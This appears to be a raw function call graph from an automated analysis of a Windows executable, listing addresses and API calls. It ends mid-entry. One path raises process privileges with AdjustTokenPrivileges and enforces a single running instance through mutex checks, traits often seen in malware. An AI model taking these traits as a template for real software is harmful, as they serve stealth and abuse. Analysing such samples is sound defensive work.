68694->68695 68698 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68695->68698 68700 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68696->68700 68699 7ff75a6c1da7 _Receive_impl 68697->68699 68702 7ff75a6c1de3 68697->68702 68698->68696 68701 7ff75a71e860 _Strcoll 8 API calls 68699->68701 68706 7ff75a6c1e00 68700->68706 68703 7ff75a6c1dcc 68701->68703 68704 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68702->68704 68703->68475 68704->68689 68705 7ff75a6c1e8d 68706->68705 68707 7ff75a6bb780 84 API calls 68706->68707 68708 7ff75a6c2a9c 68707->68708 68709 7ff75a6c1af0 84 API calls 68708->68709 68710 7ff75a6c2ac2 68709->68710 68711 7ff75a6bbd00 84 API calls 68710->68711 68712 7ff75a6c2ad2 68711->68712 68713 7ff75a6c2b3d 68712->68713 68714 7ff75a6c2add 68712->68714 68884 7ff75a6b3e90 80 API calls 68713->68884 68716 7ff75a6b2880 78 API calls 68714->68716 68718 7ff75a6c2ae7 68716->68718 68717 7ff75a6c2b49 68719 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68717->68719 68720 7ff75a69eec0 13 API calls 68718->68720 68721 7ff75a6c2b59 68719->68721 68722 7ff75a6c2af1 68720->68722 68885 7ff75a6b3e90 80 API calls 68721->68885 68724 7ff75a6b2880 78 API calls 68722->68724 68726 7ff75a6c2afb 68724->68726 68725 7ff75a6c2b66 68727 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68725->68727 68729 7ff75a6b2880 78 API calls 68726->68729 68728 7ff75a6c2b76 68727->68728 68886 7ff75a6b3e90 80 API calls 68728->68886 68731 7ff75a6c2b06 68729->68731 68734 7ff75a6bc4d0 78 API calls 68731->68734 68732 7ff75a6c2b83 68733 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68732->68733 68735 7ff75a6c2b93 68733->68735 68736 7ff75a6c2b14 68734->68736 68887 7ff75a6c4430 80 API calls 68735->68887 68738 7ff75a71e860 _Strcoll 8 API calls 68736->68738 68740 7ff75a6c2b26 68738->68740 68739 7ff75a6c2ba0 68741 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68739->68741 68740->68475 68742 7ff75a6c2bb0 68741->68742 68888 7ff75a6b3e90 80 API calls 68742->68888 68744 7ff75a6c2bbd 68745 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68744->68745 68746 7ff75a6c2bcd 68745->68746 68889 7ff75a6b3e90 80 API calls 68746->68889 68748 7ff75a6c2bda 68749 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68748->68749 68750 7ff75a6c2bea 68749->68750 68890 7ff75a6b3e90 80 API calls 68750->68890 68752 7ff75a6c2bf7 68753 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68752->68753 68754 7ff75a6c2c07 68753->68754 68891 7ff75a6b3e90 80 API calls 68754->68891 68756 7ff75a6c2c14 68757 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68756->68757 68758 7ff75a6c2c24 68757->68758 68892 7ff75a6b3e90 80 API calls 68758->68892 68760 7ff75a6c2c31 68761 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68760->68761 68762 7ff75a6c2c41 68761->68762 68893 7ff75a6b3e90 80 API calls 68762->68893 68764 7ff75a6c2c4e 68765 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68764->68765 68766 7ff75a6c2c5e 68765->68766 68894 7ff75a6b3e90 80 API calls 68766->68894 68768 7ff75a6c2c6b 68769 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68768->68769 68770 7ff75a6c2c7b 68769->68770 68772 7ff75a6bbe02 68771->68772 68773 7ff75a6bbd56 68771->68773 68774 7ff75a71e860 _Strcoll 8 API calls 68772->68774 68773->68772 68777 7ff75a6b8d10 82 API calls 68773->68777 68778 7ff75a6b3d70 82 API calls 68773->68778 68895 7ff75a69b5b0 80 API calls 68773->68895 68775 7ff75a6bbe12 68774->68775 68775->68490 68775->68491 68777->68773 68778->68773 68780 7ff75a6b2893 68779->68780 68781 7ff75a6b28b7 _Receive_impl 68779->68781 68780->68781 68782 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68780->68782 68781->68503 68783 7ff75a6b28dd 68782->68783 68785 7ff75a7207d0 __std_exception_destroy 13 API calls 68784->68785 68786 7ff75a69eeee 68785->68786 68787 7ff75a7207d0 __std_exception_destroy 13 API calls 68786->68787 68788 7ff75a69eefb 68787->68788 68788->68524 68790 7ff75a6bc4e6 68789->68790 68791 7ff75a6bc50f _Receive_impl 68789->68791 68790->68791 68792 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68790->68792 68791->68452 68793 7ff75a6bc52f 68792->68793 68794->68504 68795->68501 68796->68534 68797->68517 68798->68541 68799->68550 68800->68556 68802 7ff75a6b3ff0 82 API calls 68801->68802 68803 7ff75a6cd5c3 68802->68803 68804 7ff75a71e888 std::_Facet_Register 82 API calls 68803->68804 68805 7ff75a6cd5d8 68804->68805 68843 7ff75a6b29b0 68805->68843 68807 7ff75a6cd5f5 68808 7ff75a71e860 _Strcoll 8 API calls 68807->68808 68809 7ff75a6ca59f 68808->68809 68809->68573 68811 7ff75a6b402d 68810->68811 68813 7ff75a6b4066 68811->68813 68814 7ff75a6b4107 68811->68814 68830 7ff75a6b4350 68811->68830 68834 7ff75a6b43c2 _Receive_impl 68811->68834 68812 7ff75a71e860 _Strcoll 8 API calls 68815 7ff75a6b445f 68812->68815 68829 7ff75a6b40a6 68813->68829 68836 7ff75a6b4482 68813->68836 68859 7ff75a6b92c0 82 API calls 3 library calls 68813->68859 68827 7ff75a6b4134 68814->68827 68814->68836 68861 7ff75a6b92c0 82 API calls 3 library calls 68814->68861 68815->68467 68816 7ff75a6b4373 68819 7ff75a6b442b 68816->68819 68820 7ff75a6b437c 68816->68820 68817 7ff75a6b443a 68867 7ff75a6b00f0 82 API calls _Receive_impl 68817->68867 68818 7ff75a6b4347 68865 7ff75a6b4ca0 82 API calls 2 library calls 68818->68865 68866 7ff75a6b4ca0 82 API calls 2 library calls 68819->68866 68833 7ff75a6b447d 68820->68833 68820->68834 68841 7ff75a6b4102 _Receive_impl 68827->68841 68862 7ff75a6c0610 82 API calls 3 library calls 68827->68862 68829->68841 68860 7ff75a6c0610 82 API calls 3 library calls 68829->68860 68830->68816 68830->68817 68830->68834 68835 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68833->68835 68834->68812 68835->68836 68868 7ff75a6b0640 82 API calls 68836->68868 68837 7ff75a6b1a20 82 API calls 68837->68841 68839 7ff75a6c0610 82 API calls 68839->68841 68841->68818 68841->68837 68841->68839 68863 7ff75a6b9380 82 API calls _Receive_impl 68841->68863 68864 7ff75a6c9810 82 API calls 2 library calls 68841->68864 68842->68575 68846 7ff75a6b29de 68843->68846 68844 7ff75a6b2abd 68858 7ff75a69b8e0 82 API calls 68844->68858 68846->68844 68847 7ff75a6b2a2a 68846->68847 68849 7ff75a6b29fa ctype 68846->68849 68851 7ff75a6b2a82 68846->68851 68850 7ff75a71e888 std::_Facet_Register 82 API calls 68847->68850 68853 7ff75a6b2ab7 68847->68853 68849->68807 68852 7ff75a6b2a40 68850->68852 68854 7ff75a71e888 std::_Facet_Register 82 API calls 68851->68854 68852->68849 68856 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 68852->68856 68857 7ff75a69b820 82 API calls 2 library calls 68853->68857 68854->68849 68856->68853 68857->68844 68860->68829 68862->68827 68863->68841 68864->68841 68865->68830 68866->68834 68869->68591 68871 7ff75a6b3946 68870->68871 68872 7ff75a6b3823 68870->68872 68871->68872 68874 7ff75a6b3953 68871->68874 68873 7ff75a71e860 _Strcoll 8 API calls 68872->68873 68875 7ff75a6b3852 68873->68875 68881 7ff75a6b88c0 82 API calls 4 library calls 68874->68881 68875->68624 68877 7ff75a6b3974 68878 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 68877->68878 68879 7ff75a6b3985 68878->68879 68881->68877 68882->68685 68883->68692 68884->68717 68885->68725 68886->68732 68887->68739 68888->68744 68889->68748 68890->68752 68891->68756 68892->68760 68893->68764 68894->68768 68895->68773 68896 7ff75a709aa8 68907 7ff75a70990c 68896->68907 68898 7ff75a709b08 68900 7ff75a709acf 68898->68900 68902 7ff75a709b49 68898->68902 68925 7ff75a70e768 78 API calls 2 library calls 68898->68925 68913 7ff75a709934 68902->68913 68905 7ff75a709b3d 68905->68902 68926 7ff75a710318 11 API calls 2 library calls 68905->68926 68908 7ff75a709925 68907->68908 68909 7ff75a709915 68907->68909 68908->68898 68908->68900 68924 7ff75a709a2c 78 API calls _invalid_parameter_noinfo 68908->68924 68927 7ff75a704e68 11 API calls _get_daylight 68909->68927 68911 7ff75a70991a 68928 7ff75a708234 78 API calls _invalid_parameter_noinfo 68911->68928 68914 7ff75a70990c _fread_nolock 78 API calls 68913->68914 68915 7ff75a709959 68914->68915 68916 7ff75a709969 68915->68916 68917 7ff75a7099fa 68915->68917 68919 7ff75a709987 68916->68919 68921 7ff75a7099a5 68916->68921 68938 7ff75a70ce18 78 API calls 2 library calls 68917->68938 68937 7ff75a70ce18 78 API calls 2 library calls 68919->68937 68922 7ff75a709995 68921->68922 68929 7ff75a710f48 68921->68929 68922->68900 68924->68898 68925->68905 68926->68902 68927->68911 68928->68908 68930 7ff75a710f78 68929->68930 68939 7ff75a710d7c 68930->68939 68934 7ff75a710fcc 68934->68922 68935 7ff75a710fb7 68935->68934 68951 7ff75a6ff864 78 API calls 2 library calls 68935->68951 68937->68922 68938->68922 68941 7ff75a710dd3 68939->68941 68949 7ff75a710da5 68939->68949 68940 7ff75a710dec 68953 7ff75a708168 78 API calls 2 library calls 68940->68953 68941->68940 68943 7ff75a710e43 68941->68943 68952 7ff75a71555c EnterCriticalSection 68943->68952 68949->68935 68950 7ff75a6ff864 78 API calls 2 library calls 68949->68950 68950->68935 68951->68934 68953->68949 68954 7ff75a71f0ac 68977 7ff75a71e9d0 68954->68977 68957 7ff75a71f1f8 69071 7ff75a71f2b8 7 API calls 2 library calls 68957->69071 68958 7ff75a71f0c8 __scrt_acquire_startup_lock 68960 7ff75a71f202 68958->68960 68965 7ff75a71f0e6 __scrt_release_startup_lock 68958->68965 69072 7ff75a71f2b8 7 API calls 2 library calls 68960->69072 68962 7ff75a71f10b 68963 7ff75a71f20d __std_fs_directory_iterator_open 68964 7ff75a71f191 68985 7ff75a71f400 68964->68985 68965->68962 68965->68964 69068 7ff75a71505c 78 API calls 68965->69068 68967 7ff75a71f196 68988 7ff75a72de08 68967->68988 68978 7ff75a71e9d8 68977->68978 68979 7ff75a71e9e4 __scrt_dllmain_crt_thread_attach 68978->68979 68980 7ff75a71e9f1 68979->68980 68983 7ff75a71e9ed 68979->68983 69073 7ff75a72ddbc 68980->69073 68983->68957 68983->68958 69090 7ff75a731650 68985->69090 69092 7ff75a7164e4 68988->69092 68990 7ff75a71f19e 68993 7ff75a6ec600 68990->68993 68991 7ff75a72de17 68991->68990 69098 7ff75a72ec70 78 API calls TranslateName 68991->69098 69101 7ff75a6ef820 GetCurrentProcess OpenProcessToken 68993->69101 68996 7ff75a6ec624 69144 7ff75a6efb60 83 API calls 2 library calls 68996->69144 68997 7ff75a6ec64e 69108 7ff75a6fb9b0 GetCurrentProcess OpenProcessToken 68997->69108 69001 7ff75a6ec62e 69145 7ff75a6fa780 110 API calls _Strcoll 69001->69145 69002 7ff75a6fb9b0 13 API calls 69004 7ff75a6ec666 69002->69004 69116 7ff75a6ed030 69004->69116 69005 7ff75a6ec637 69146 7ff75a6b2660 78 API calls 2 library calls 69005->69146 69007 7ff75a6ec642 ExitProcess 69010 7ff75a6ec734 OpenMutexA 69011 7ff75a6ec76d ExitProcess 69010->69011 69012 7ff75a6ec779 CreateMutexExA 69010->69012 69120 7ff75a6e66f0 69012->69120 69013 7ff75a6ec72f _Receive_impl 69013->69010 69015 7ff75a6ec8c6 69016 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69015->69016 69018 7ff75a6ec8cb 69016->69018 69021 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69018->69021 69024 7ff75a6ec8d1 69021->69024 69068->68964 69071->68960 69072->68963 69074 7ff75a72ed20 69073->69074 69075 7ff75a71e9f6 69074->69075 69078 7ff75a70bd30 69074->69078 69075->68983 69077 7ff75a720e6c 7 API calls 2 library calls 69075->69077 69077->68983 69089 7ff75a70c3bc EnterCriticalSection 69078->69089 69091 7ff75a71f417 GetStartupInfoW 69090->69091 69091->68967 69093 7ff75a716536 69092->69093 69094 7ff75a7164f1 69092->69094 69093->68991 69099 7ff75a709fc0 83 API calls 3 library calls 69094->69099 69096 7ff75a716520 69100 7ff75a7161bc 91 API calls 3 library calls 69096->69100 69098->68991 69099->69096 69100->69093 69102 7ff75a6ef8b4 69101->69102 69103 7ff75a6ef878 GetTokenInformation 69101->69103 69104 7ff75a6ef8c1 CloseHandle 69102->69104 69105 7ff75a6ef8cd 69102->69105 69103->69102 69104->69105 69106 7ff75a71e860 _Strcoll 8 API calls 69105->69106 69107 7ff75a6ec620 69106->69107 69107->68996 69107->68997 69109 7ff75a6fba1b LookupPrivilegeValueW 69108->69109 69111 7ff75a6fba86 69108->69111 69110 7ff75a6fba3c AdjustTokenPrivileges 69109->69110 69109->69111 69110->69111 69112 7ff75a6fba8e CloseHandle 69111->69112 69113 7ff75a6fba9a 69111->69113 69112->69113 69114 7ff75a71e860 _Strcoll 8 API calls 69113->69114 69115 7ff75a6ec65a 69114->69115 69115->69002 69117 7ff75a6ed052 69116->69117 69117->69117 69147 7ff75a6e0920 69117->69147 69119 7ff75a6ec6f6 69119->69010 69119->69013 69119->69015 69121 7ff75a6e6721 69120->69121 69153 7ff75a6e75e0 82 API calls 2 library calls 69121->69153 69123 7ff75a6e6e3c 69154 7ff75a6b4600 82 API calls 5 library calls 69123->69154 69125 7ff75a6e6e7f 69155 7ff75a6e0040 69125->69155 69127 7ff75a6e6eb7 69164 7ff75a6b1900 69127->69164 69131 7ff75a6e6f3b 69183 7ff75a6b5ad0 82 API calls 3 library calls 69131->69183 69133 7ff75a6e6f51 69134 7ff75a6e6f7c _Receive_impl 69133->69134 69184 7ff75a6b8830 78 API calls 2 library calls 69133->69184 69185 7ff75a6b1600 69134->69185 69136 7ff75a6e7015 69138 7ff75a6b2880 78 API calls 69136->69138 69139 7ff75a6e7023 69138->69139 69140 7ff75a6b2880 78 API calls 69139->69140 69141 7ff75a6e702e 69140->69141 69142 7ff75a6b1900 82 API calls 69141->69142 69143 7ff75a6e7089 69142->69143 69144->69001 69145->69005 69146->69007 69148 7ff75a6e09e5 69147->69148 69151 7ff75a6e0950 ctype 69147->69151 69152 7ff75a6e45c0 83 API calls 5 library calls 69148->69152 69150 7ff75a6e09fa 69150->69119 69151->69119 69152->69150 69153->69123 69154->69125 69156 7ff75a6b37f0 82 API calls 69155->69156 69157 7ff75a6e0076 69156->69157 69192 7ff75a6e24b0 69157->69192 69163 7ff75a6e010f 69163->69127 69165 7ff75a6b193f 69164->69165 69166 7ff75a6b1937 69164->69166 69169 7ff75a6b19d9 69165->69169 69360 7ff75a6b7d40 69165->69360 69370 7ff75a6b7e80 82 API calls 2 library calls 69166->69370 69371 7ff75a6b7f10 82 API calls 69169->69371 69170 7ff75a6b195d 69172 7ff75a6b1990 _Receive_impl 69170->69172 69176 7ff75a6b19d4 69170->69176 69174 7ff75a71e860 _Strcoll 8 API calls 69172->69174 69173 7ff75a6b19f6 69175 7ff75a6b7ac0 82 API calls 69173->69175 69177 7ff75a6b19bf 69174->69177 69179 7ff75a6b1a09 69175->69179 69178 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69176->69178 69182 7ff75a6b57c0 82 API calls Concurrency::cancel_current_task 69177->69182 69178->69169 69180 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69179->69180 69181 7ff75a6b1a1a 69180->69181 69182->69131 69183->69133 69184->69134 69186 7ff75a6b1611 69185->69186 69187 7ff75a6b1646 _Receive_impl 69185->69187 69373 7ff75a6b8830 78 API calls 2 library calls 69186->69373 69187->69136 69189 7ff75a6b161a 69189->69187 69190 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69189->69190 69191 7ff75a6b1666 69190->69191 69193 7ff75a6e24f4 69192->69193 69281 7ff75a70494c 69193->69281 69197 7ff75a6e00f5 69198 7ff75a6e02c0 69197->69198 69199 7ff75a6e05d1 69198->69199 69203 7ff75a6e030b __scrt_get_show_window_mode 69198->69203 69357 7ff75a6e3710 84 API calls 2 library calls 69199->69357 69201 7ff75a6e0604 69202 7ff75a6e0a10 82 API calls 69201->69202 69210 7ff75a6e0610 69202->69210 69354 7ff75a6bb5b0 82 API calls 69203->69354 69205 7ff75a6e035b 69355 7ff75a6e2840 84 API calls 2 library calls 69205->69355 69207 7ff75a6e05cc _Receive_impl 69214 7ff75a71e860 _Strcoll 8 API calls 69207->69214 69208 7ff75a6e036b 69211 7ff75a6e0a10 82 API calls 69208->69211 69209 7ff75a6b37f0 82 API calls 69212 7ff75a6e07cc 69209->69212 69213 7ff75a6bb780 84 API calls 69210->69213 69266 7ff75a6e0797 _Receive_impl 69210->69266 69228 7ff75a6e0377 69211->69228 69216 7ff75a6b3ff0 82 API calls 69212->69216 69217 7ff75a6e065d 69213->69217 69218 7ff75a6e0101 69214->69218 69215 7ff75a6e08b5 69219 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69215->69219 69223 7ff75a6e0806 69216->69223 69220 7ff75a6c1af0 84 API calls 69217->69220 69274 7ff75a6e0200 69218->69274 69224 7ff75a6e08bb 69219->69224 69225 7ff75a6e0683 69220->69225 69221 7ff75a6e0565 69227 7ff75a6e05bf 69221->69227 69231 7ff75a6b37f0 82 API calls 69221->69231 69222 7ff75a6e051d 69226 7ff75a6b37f0 82 API calls 69222->69226 69223->69207 69223->69215 69358 7ff75a6b3e90 80 API calls 69224->69358 69229 7ff75a6bbd00 84 API calls 69225->69229 69230 7ff75a6e0538 69226->69230 69356 7ff75a6bb3d0 82 API calls 2 library calls 69227->69356 69232 7ff75a6bb780 84 API calls 69228->69232 69273 7ff75a6e0504 _Receive_impl 69228->69273 69246 7ff75a6e0692 _Receive_impl 69229->69246 69240 7ff75a6b3ff0 82 API calls 69230->69240 69231->69230 69235 7ff75a6e03c3 69232->69235 69239 7ff75a6c1af0 84 API calls 69235->69239 69236 7ff75a6e08c8 69241 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69236->69241 69237 7ff75a6e08ea 69359 7ff75a6b3e90 80 API calls 69237->69359 69244 7ff75a6e03e9 69239->69244 69240->69227 69245 7ff75a6e08d8 69241->69245 69242 7ff75a7207d0 __std_exception_destroy 13 API calls 69248 7ff75a6e070a 69242->69248 69243 7ff75a6e08f7 69249 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69243->69249 69250 7ff75a6bbd00 84 API calls 69244->69250 69254 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69245->69254 69246->69237 69246->69242 69247 7ff75a6e0907 69246->69247 69253 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69247->69253 69251 7ff75a7207d0 __std_exception_destroy 13 API calls 69248->69251 69249->69247 69252 7ff75a6e03f9 69250->69252 69265 7ff75a6e0718 _Receive_impl 69251->69265 69252->69224 69256 7ff75a6e040e 69252->69256 69257 7ff75a6e090d 69253->69257 69255 7ff75a6e08de 69254->69255 69260 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69255->69260 69256->69245 69258 7ff75a6e0445 _Receive_impl 69256->69258 69259 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69257->69259 69261 7ff75a7207d0 __std_exception_destroy 13 API calls 69258->69261 69262 7ff75a6e0913 69259->69262 69263 7ff75a6e08e4 69260->69263 69264 7ff75a6e0479 69261->69264 69270 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69263->69270 69267 7ff75a7207d0 __std_exception_destroy 13 API calls 69264->69267 69265->69257 69265->69266 69268 7ff75a6e08b0 69265->69268 69266->69209 69266->69223 69271 7ff75a6e0487 69267->69271 69269 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69268->69269 69269->69215 69270->69237 69271->69255 69272 7ff75a6e04be _Receive_impl 69271->69272 69272->69263 69272->69273 69273->69221 69273->69222 69275 7ff75a6e021c 69274->69275 69276 7ff75a6e0241 _Receive_impl 69274->69276 69275->69276 69278 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69275->69278 69277 7ff75a6e0289 _Receive_impl 69276->69277 69279 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69276->69279 69277->69163 69278->69276 69280 7ff75a6e02b3 69279->69280 69305 7ff75a709eec GetLastError 69281->69305 69286 7ff75a6e0a10 69287 7ff75a6e0a33 69286->69287 69291 7ff75a6e0a80 69286->69291 69349 7ff75a6e2180 82 API calls 69287->69349 69290 7ff75a6e0a38 69290->69291 69350 7ff75a6e2180 82 API calls 69290->69350 69352 7ff75a6e0d70 82 API calls 69291->69352 69293 7ff75a6e0bb7 69296 7ff75a71e860 _Strcoll 8 API calls 69293->69296 69294 7ff75a6e0a47 69295 7ff75a6e0a5d 69294->69295 69351 7ff75a6e2180 82 API calls 69294->69351 69298 7ff75a71e860 _Strcoll 8 API calls 69295->69298 69299 7ff75a6e0cb5 69296->69299 69301 7ff75a6e0a7a 69298->69301 69299->69197 69300 7ff75a6e0a56 69300->69291 69300->69295 69301->69197 69302 7ff75a6e2180 82 API calls 69304 7ff75a6e0ac1 69302->69304 69304->69293 69304->69302 69353 7ff75a6e0d70 82 API calls 69304->69353 69306 7ff75a709f2d FlsSetValue 69305->69306 69307 7ff75a709f10 FlsGetValue 69305->69307 69309 7ff75a709f3f 69306->69309 69324 7ff75a709f1d 69306->69324 69308 7ff75a709f27 69307->69308 69307->69324 69308->69306 69331 7ff75a70da30 69309->69331 69310 7ff75a709f99 SetLastError 69312 7ff75a709fb9 69310->69312 69313 7ff75a704955 69310->69313 69345 7ff75a7098b4 78 API calls __std_fs_directory_iterator_open 69312->69345 69327 7ff75a70c178 69313->69327 69316 7ff75a709f6c FlsSetValue 69320 7ff75a709f78 FlsSetValue 69316->69320 69321 7ff75a709f8a 69316->69321 69317 7ff75a709f5c FlsSetValue 69319 7ff75a709f65 69317->69319 69338 7ff75a70d3c8 69319->69338 69320->69319 69344 7ff75a709c9c 11 API calls _Getcoll 69321->69344 69324->69310 69325 7ff75a709f92 69326 7ff75a70d3c8 __free_lconv_num 11 API calls 69325->69326 69326->69310 69328 7ff75a70c18d 69327->69328 69329 7ff75a6e25cc 69327->69329 69328->69329 69348 7ff75a715c14 78 API calls 3 library calls 69328->69348 69329->69286 69336 7ff75a70da41 wcsftime 69331->69336 69332 7ff75a70da92 69346 7ff75a704e68 11 API calls _get_daylight 69332->69346 69333 7ff75a70da76 HeapAlloc 69334 7ff75a709f4e 69333->69334 69333->69336 69334->69316 69334->69317 69336->69332 69336->69333 69337 7ff75a719f1c std::_Facet_Register 2 API calls 69336->69337 69337->69336 69339 7ff75a70d3cd RtlFreeHeap 69338->69339 69340 7ff75a70d3fe 69338->69340 69339->69340 69341 7ff75a70d3e8 GetLastError 69339->69341 69340->69324 69342 7ff75a70d3f5 __free_lconv_num 69341->69342 69347 7ff75a704e68 11 API calls _get_daylight 69342->69347 69344->69325 69346->69334 69347->69340 69348->69329 69349->69290 69350->69294 69351->69300 69352->69304 69353->69304 69354->69205 69355->69208 69356->69207 69357->69201 69358->69236 69359->69243 69361 7ff75a6b7d66 69360->69361 69362 7ff75a6b7e73 69361->69362 69363 7ff75a6b7dac 69361->69363 69369 7ff75a6b7e1f 69361->69369 69372 7ff75a69b9e0 82 API calls 69362->69372 69365 7ff75a71e888 std::_Facet_Register 82 API calls 69363->69365 69367 7ff75a6b7dca 69365->69367 69368 7ff75a6b37f0 82 API calls 69367->69368 69368->69369 69369->69170 69370->69165 69371->69173 69373->69189 69374 7ff75a6dd080 69475 7ff75a69eaf0 69374->69475 69377 7ff75a69eaf0 97 API calls 69378 7ff75a6dd954 69377->69378 69391 7ff75a6ddd76 _Receive_impl 69378->69391 69481 7ff75a69d4e0 69378->69481 69380 7ff75a71e860 _Strcoll 8 API calls 69382 7ff75a6ddda1 69380->69382 69390 7ff75a6ddd3d 69390->69391 69392 7ff75a6dddbd 69390->69392 69391->69380 69393 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69392->69393 69394 7ff75a6dddc2 69393->69394 69520 7ff75a6b79f0 69394->69520 69397 7ff75a6b7ac0 82 API calls 69398 7ff75a6dddfa 69397->69398 69399 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69398->69399 69400 7ff75a6dde0d 69399->69400 69528 7ff75a69e1d0 69400->69528 69476 7ff75a69eb21 69475->69476 69477 7ff75a72b5b0 97 API calls 69476->69477 69478 7ff75a69eb3d 69477->69478 69479 7ff75a71e860 _Strcoll 8 API calls 69478->69479 69480 7ff75a69ebc2 69479->69480 69480->69377 69484 7ff75a69d509 69481->69484 69482 7ff75a6a6940 82 API calls 69483 7ff75a69d59a 69482->69483 69485 7ff75a69d370 69483->69485 69484->69482 69486 7ff75a69d3a0 69485->69486 69534 7ff75a72b260 69486->69534 69489 7ff75a69d43a 69502 7ff75a6dfdd0 69489->69502 69490 7ff75a69d489 69542 7ff75a69c160 82 API calls 2 library calls 69490->69542 69493 7ff75a69d48f 69543 7ff75a69c530 82 API calls Concurrency::cancel_current_task 69493->69543 69494 7ff75a69d3f3 69494->69493 69496 7ff75a6b27e0 82 API calls 69494->69496 69498 7ff75a69d410 69496->69498 69540 7ff75a72b2d0 WideCharToMultiByte WideCharToMultiByte GetLastError WideCharToMultiByte GetLastError 69498->69540 69500 7ff75a69d42f 69500->69489 69541 7ff75a69c530 82 API calls Concurrency::cancel_current_task 69500->69541 69503 7ff75a6dfdf6 69502->69503 69504 7ff75a6e0920 83 API calls 69503->69504 69505 7ff75a6dd9ab 69504->69505 69506 7ff75a6ef8f0 69505->69506 69549 7ff75a6ef020 69506->69549 69510 7ff75a6ef94a 69511 7ff75a69f380 78 API calls 69510->69511 69512 7ff75a6ef9bd 69511->69512 69513 7ff75a71e860 _Strcoll 8 API calls 69512->69513 69514 7ff75a6dda5d 69513->69514 69515 7ff75a69f380 69514->69515 69516 7ff75a69f394 69515->69516 69517 7ff75a69f3c2 _Receive_impl 69515->69517 69516->69517 69518 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69516->69518 69517->69390 69519 7ff75a69f3e8 69518->69519 69519->69390 69521 7ff75a6b7a40 69520->69521 69521->69521 69522 7ff75a6b7a6e 69521->69522 69523 7ff75a6b8560 82 API calls 69521->69523 69524 7ff75a6b3d70 82 API calls 69522->69524 69523->69522 69525 7ff75a6b7a8a 69524->69525 69526 7ff75a6b3d70 82 API calls 69525->69526 69527 7ff75a6b7aa4 69526->69527 69527->69397 69529 7ff75a69e1e9 69528->69529 70051 7ff75a69db70 87 API calls 2 library calls 69529->70051 69531 7ff75a69e220 69532 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69531->69532 69533 7ff75a69e231 69532->69533 69544 7ff75a7169a4 69534->69544 69537 7ff75a72b272 AreFileApisANSI 69538 7ff75a69d3ac 69537->69538 69538->69489 69538->69490 69539 7ff75a72b2d0 WideCharToMultiByte WideCharToMultiByte GetLastError WideCharToMultiByte GetLastError 69538->69539 69539->69494 69540->69500 69542->69493 69545 7ff75a709eec _Getcoll 78 API calls 69544->69545 69546 7ff75a7169ad 69545->69546 69547 7ff75a70c178 _Getcoll 78 API calls 69546->69547 69548 7ff75a7169c6 69547->69548 69548->69537 69548->69538 69550 7ff75a69eaf0 97 API calls 69549->69550 69554 7ff75a6ef06f __scrt_get_show_window_mode 69550->69554 69551 7ff75a6ef0a7 69552 7ff75a6ef7bf 69551->69552 69592 7ff75a6ef0af 69551->69592 69675 7ff75a69e240 87 API calls Concurrency::cancel_current_task 69552->69675 69554->69551 69554->69592 69612 7ff75a6ba910 69554->69612 69555 7ff75a6ef7d6 69559 7ff75a708254 _invalid_parameter_noinfo_noreturn 78 API calls 69555->69559 69556 7ff75a71e860 _Strcoll 8 API calls 69557 7ff75a6ef751 69556->69557 69557->69510 69607 7ff75a6b5310 69557->69607 69567 7ff75a6ef7dc 69559->69567 69560 7ff75a6ef0ee 69561 7ff75a6ef545 69560->69561 69562 7ff75a6ef151 69560->69562 69629 7ff75a6cfdb0 69561->69629 69662 7ff75a6f9b70 30 API calls 2 library calls 69562->69662 69676 7ff75a69cdc0 82 API calls 69567->69676 69569 7ff75a6ef163 69663 7ff75a6f9d30 98 API calls 6 library calls 69569->69663 69573 7ff75a6ef800 69576 7ff75a720e88 Concurrency::cancel_current_task 2 API calls 69573->69576 69574 7ff75a6ef597 69578 7ff75a6cfdb0 84 API calls 69574->69578 69575 7ff75a6ef174 69579 7ff75a6ef25c GetFileSize 69575->69579 69580 7ff75a6ef187 69575->69580 69581 7ff75a6ef811 69576->69581 69577 7ff75a6b8560 82 API calls 69577->69574 69583 7ff75a6ef5aa 69578->69583 69582 7ff75a6ef29d 69579->69582 69587 7ff75a6ef278 __scrt_get_show_window_mode 69579->69587 69580->69555 69584 7ff75a6ef1ce _Receive_impl 69580->69584 69582->69587 69590 7ff75a6b8e80 82 API calls 69582->69590 69648 7ff75a6fd640 69583->69648 69664 7ff75a6b12f0 82 API calls 69584->69664 69586 7ff75a6ef302 SetFilePointer ReadFile 69598 7ff75a6ef462 69586->69598 69600 7ff75a6ef351 69586->69600 69587->69586 69589 